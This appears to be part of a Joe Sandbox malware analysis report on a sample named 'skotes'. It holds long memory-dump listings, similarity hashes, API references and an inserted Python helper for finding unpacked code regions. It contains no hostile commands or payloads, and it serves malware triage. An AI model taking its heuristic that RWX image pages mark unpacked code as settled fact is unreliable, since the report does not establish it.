                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
• String ID:
• API String ID: 2885714658-0
• Opcode ID: d62b73c3aff8ea02eea97b8c0b7a89144f65b92b3e46204b315fdad119abebe9
• Instruction ID: 7991f7f44bd5bff5e13efc1066fc091e057fb92994a3df3fb5cc94c3cf0e6a41
• Opcode Fuzzy Hash: d62b73c3aff8ea02eea97b8c0b7a89144f65b92b3e46204b315fdad119abebe9
• Instruction Fuzzy Hash: BB41AFB0A042449ACF54FFA084557ED7BA76F11304F1440ADE9426F3C3EB759E86CB6A
APIs
• Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 006BE7D7
  • Part of subcall function 006BE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 006BE577
  • Part of subcall function 006BE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 006BE599
• Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 006BE854
• Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 006BE860
• Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 006BE86F
• Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 006BE879
• Concurrency::location::_Assign.LIBCMT ref: 006BE8AD
• Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 006BE8B5
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
• String ID:
• API String ID: 1924466884-0
• Opcode ID: 87d4a69d66b930c865a05a2a78937122fc1a8a551ce397b87276fdb0d41bb46d
• Instruction ID: 557ccfca34fc9a50744cf84214ffd86a28cfcf367ef5c322389f96a301220ccc
• Opcode Fuzzy Hash: 87d4a69d66b930c865a05a2a78937122fc1a8a551ce397b87276fdb0d41bb46d
• Instruction Fuzzy Hash: DF411A75A002049FCB45EF64C495AEDB7BAFF48310F1580A9ED499B382DB70A981CF91
APIs
• __Mtx_unlock.LIBCPMT ref: 006A6ED1
• std::_Rethrow_future_exception.LIBCPMT ref: 006A6F22
• std::_Rethrow_future_exception.LIBCPMT ref: 006A6F32
• __Mtx_unlock.LIBCPMT ref: 006A6FD5
• __Mtx_unlock.LIBCPMT ref: 006A70DB
• __Mtx_unlock.LIBCPMT ref: 006A7116
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
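The memory dump names listed under "Memory Dump Source" carry the process index, the dump phase, a dump id, the region base address and the Windows page protection of each dumped region. The following Python helper is an added example for triaging such a listing offline; it is not Joe Sandbox's own code. The field layout it parses is an assumption inferred from the naming pattern on this page (pid, phase and dump id read as decimal, the remaining fields as hex); the PAGE_* and MEM_IMAGE values are the winnt.h constants. For an image mapped with a PAGE_EXECUTE_WRITECOPY section, a page that the process has written to is reported as a private PAGE_EXECUTE_READWRITE page, so the 0x40 regions in a listing like the one above are the first places to look for code that was unpacked or patched in place. The sample lines are a subset copied from the listing above, with the "Download File" link text left attached to show that it is ignored.

```python
"""Triage helper for the "Memory Dump Source" listings of a Joe Sandbox report.

Added example, not Joe Sandbox's own code. ASSUMED field layout, inferred from
the names on this page and not documented here:
  <pid>.<phase>.<dump id>.<base>.<protect>.<f6>.<mem type>.<f8>.sdmp
pid, phase and dump id are read as decimal, the remaining fields as hex.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# winnt.h PAGE_* values; the fifth field of a dump name holds one of these.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_IMAGE = 0x01000000  # winnt.h; every dump on this page carries 01000000 here

NAME_RE = re.compile(r"([0-9A-Fa-f]{8}(?:\.[0-9A-Fa-f]+){7}\.sdmp)")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")


@dataclass(frozen=True)
class DumpName:
    pid: int
    phase: int
    dump_id: int
    base: int
    protect: int
    f6: int        # meaning not known from the page
    mem_type: int
    f8: int        # meaning not known from the page

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def is_image(self) -> bool:
        return self.mem_type == MEM_IMAGE

    @property
    def written(self) -> bool:
        # A copy-on-write image page (PAGE_EXECUTE_WRITECOPY) that has been
        # written becomes a private PAGE_EXECUTE_READWRITE page, so for an
        # image dump 0x40 marks pages modified after the image was mapped.
        return self.is_image and self.protect == 0x40


def parse_dump_name(name: str) -> DumpName:
    parts = name.strip().removesuffix(".sdmp").split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected dump name: {name!r}")
    pid, phase, dump_id = (int(p, 10) for p in parts[:3])
    base, protect, f6, mem_type, f8 = (int(p, 16) for p in parts[3:])
    return DumpName(pid, phase, dump_id, base, protect, f6, mem_type, f8)


def parse_report_lines(lines: List[str]) -> Tuple[Optional[int], List[DumpName]]:
    """Extract every dump name from report lines. Link text fused to a name
    ("Download File") is ignored because the regex stops at ".sdmp". Returns the
    PE offset from a "Source File" line, if present, and the names in order."""
    image_base = None
    dumps: List[DumpName] = []
    for line in lines:
        m = NAME_RE.search(line)
        if not m:
            continue
        dumps.append(parse_dump_name(m.group(1)))
        o = OFFSET_RE.search(line)
        if o:
            image_base = int(o.group(1), 16)
    return image_base, dumps


def summarize(image_base: Optional[int], dumps: List[DumpName]) -> Dict[str, object]:
    """Count dumps per protection and list the bases of image pages written
    after mapping, i.e. the candidate regions for unpacked or patched code."""
    return {
        "image_base": image_base,
        "pids": sorted({d.pid for d in dumps}),
        "by_protection": dict(Counter(d.protect_name for d in dumps)),
        "written_image_pages": sorted(d.base for d in dumps if d.written),
    }


# Constructed sample: a subset of the lines from this report's listing.
SAMPLE_LINES = [
    "• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true",
    "• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File",
    "• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File",
    "• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File",
    "• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File",
]

if __name__ == "__main__":
    base, dumps = parse_report_lines(SAMPLE_LINES)
    for d in dumps:
        print(f"pid={d.pid} base=0x{d.base:08x} {d.protect_name:24} "
              f"image={d.is_image} written={d.written}")
    print(summarize(base, dumps))
```

Run against the full list above, `written_image_pages` gives the set of 0x40 regions interleaved with the untouched 0x80 ones, which is the page-granular footprint of what the process changed inside its own image; dump the 0x40 regions first when hunting the unpacked payload.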
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1997747980-0
                                                                                                                                                                                                                                          • Opcode ID: 6fb8eb4de598f682f12c36cc28cb91d0d645904717911d977f664747187e663e
                                                                                                                                                                                                                                          • Instruction ID: 3cf41ed2e8374937db2e48fe06afc6fee80af5ae72a04f0b0467666c99e9f0c6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6fb8eb4de598f682f12c36cc28cb91d0d645904717911d977f664747187e663e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FC1CFB19047049FDF21EFA4C845BAABBF6AF16310F04456DE81697782EB31AD04CF61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 006B4538
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 006B456C
                                                                                                                                                                                                                                          • Hash.LIBCMT ref: 006B45D5
                                                                                                                                                                                                                                          • Hash.LIBCMT ref: 006B45E5
                                                                                                                                                                                                                                            • Part of subcall function 006B9C41: std::bad_exception::bad_exception.LIBCMT ref: 006B9C63
                                                                                                                                                                                                                                          • Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 006B474B
                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006B47A4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
